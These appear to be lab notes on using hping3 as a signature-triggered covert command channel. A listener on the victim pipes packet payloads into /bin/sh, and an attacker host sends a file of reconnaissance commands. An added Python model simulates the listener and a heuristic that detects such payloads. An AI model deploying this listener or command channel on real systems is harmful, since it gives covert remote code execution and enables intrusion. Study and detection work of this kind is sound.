- Box A - victim, running a network service on port 8834. We'll reuse this port for the listener.
- Box B - attacker host behind NAT. It will transmit commands to the listener waiting on the victim.
This is similar to a reverse shell from box A to box B, except that B needs another way to view the results of the commands executed on A.
A:
$ sudo hping3 --listen SecretSignature -I vboxnet0 -p 8834 | /bin/sh
--listen - Listen mode. Waits for packets containing the signature and dumps the data from the signature to the end of the packet
-I - Interface to listen on
-p - listening port
This will intercept packets and dump the content that follows a matching signature. The commands are passed to the shell and executed. Another trick would be needed to view the output of the commands, though.
B:
$ sudo hping3 --count 1 --data 200 --file commands.txt --sign SecretSignature 192.168.56.1 -V -p 8834
--count 1 - stop after sending 1 packet
--data 200 - set packet body size in bytes
--file - fill packet with data from file
--sign - put the signature at the start of the packet data (the payload is prefixed with it)
-V - verbose
-p - destination port
$ cat commands.txt
echo 123 > hacked.txt
whoami > log.txt
uname -a >> log.txt
pwd >> log.txt
ls -al >> log.txt
ifconfig -a >> log.txt
(New line at the end, to get the last command executed!)
Verify on victim machine A that the commands have been executed and the results saved in the corresponding files.
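The following is an added example written for these notes; it is not hping3 code and does not use hping3. It models two things the notes describe: the listener step (everything after the first occurrence of the signature is handed to the shell, and the shell only executes newline-terminated lines, which is why the trailing newline matters) and a defender-side check that flags packet payloads carrying a multi-line shell script without knowing the signature in advance. All packets, the signature value and the command lines are constructed sample data, and the NUL padding and the `looks_like_script` thresholds are assumptions, not observed hping3 behaviour.

```python
"""Added example: model of the signature-triggered listener and a detection heuristic.
Constructed data only; hping3 itself is not involved."""
import re
from typing import List, Optional, Tuple

# Commands that commonly start a line of an ad-hoc recon script (heuristic, assumption).
SHELL_HINTS = re.compile(rb"^\s*(whoami|uname|id|ls|ifconfig|pwd|cat|echo)\b")
# Output redirection into a file, as in 'whoami > log.txt' / 'uname -a >> log.txt'.
REDIRECT = re.compile(rb">>?\s*\S")


def extract_after_signature(payload: bytes, signature: bytes) -> Optional[bytes]:
    """Mimic the listener: return the bytes following the first signature match, or None."""
    idx = payload.find(signature)
    if idx < 0:
        return None
    return payload[idx + len(signature):]


def complete_lines(buffer: bytes) -> Tuple[List[bytes], bytes]:
    """Split a pipe stream into newline-terminated lines (what sh executes) and the pending remainder.
    A final line with no '\\n' stays pending because the listener keeps the pipe open."""
    lines = buffer.split(b"\n")
    remainder = lines.pop()  # empty if the data ended with a newline
    return [ln for ln in lines if ln.strip()], remainder


def simulate_listener(payload: bytes, signature: bytes) -> Tuple[List[bytes], bytes]:
    """Executed lines and pending bytes for one packet; NUL padding is stripped (assumption)."""
    data = extract_after_signature(payload, signature)
    if data is None:
        return [], b""
    return complete_lines(data.rstrip(b"\x00"))


def looks_like_script(payload: bytes) -> bool:
    """Defender heuristic, no signature knowledge needed: at least two lines that start with a
    shell-looking command and at least one output redirection. The first line is usually masked
    by the signature prefix, so the threshold counts the remaining lines."""
    cmds = [ln for ln in payload.rstrip(b"\x00").split(b"\n") if ln.strip()]
    hinted = sum(1 for ln in cmds if SHELL_HINTS.match(ln))
    return hinted >= 2 and any(REDIRECT.search(ln) for ln in cmds)


def scan(packets: List[dict]) -> List[int]:
    """Return indexes of packets whose payload looks like an embedded shell script."""
    return [i for i, pkt in enumerate(packets) if looks_like_script(pkt["payload"])]


SIG = b"SecretSignature"  # constructed value, matching the notes
SAMPLE_PACKETS = [  # constructed packets, all to the service port from the notes
    {"dst_port": 8834, "payload": b"GET /status HTTP/1.1\r\nHost: 192.168.56.1\r\n\r\n"},
    {"dst_port": 8834, "payload": SIG + b"echo 123 > hacked.txt\nwhoami > log.txt\nuname -a >> log.txt\n" + b"\x00" * 20},
    {"dst_port": 8834, "payload": SIG + b"whoami > log.txt\nuname -a >> log.txt\npwd >> log.txt"},  # no trailing newline
]

if __name__ == "__main__":
    for i, pkt in enumerate(SAMPLE_PACKETS):
        executed, pending = simulate_listener(pkt["payload"], SIG)
        print(f"packet {i}: executed={executed} pending={pending!r}")
    print("flagged packets:", scan(SAMPLE_PACKETS))
```

Running the block shows that packet 2 leaves `pwd >> log.txt` pending, which is the situation the note about the trailing newline warns about, while `scan` flags both command-carrying packets without being told the signature; in practice the heuristic is a starting point for a network sensor rule and would be tuned against the traffic the port normally carries.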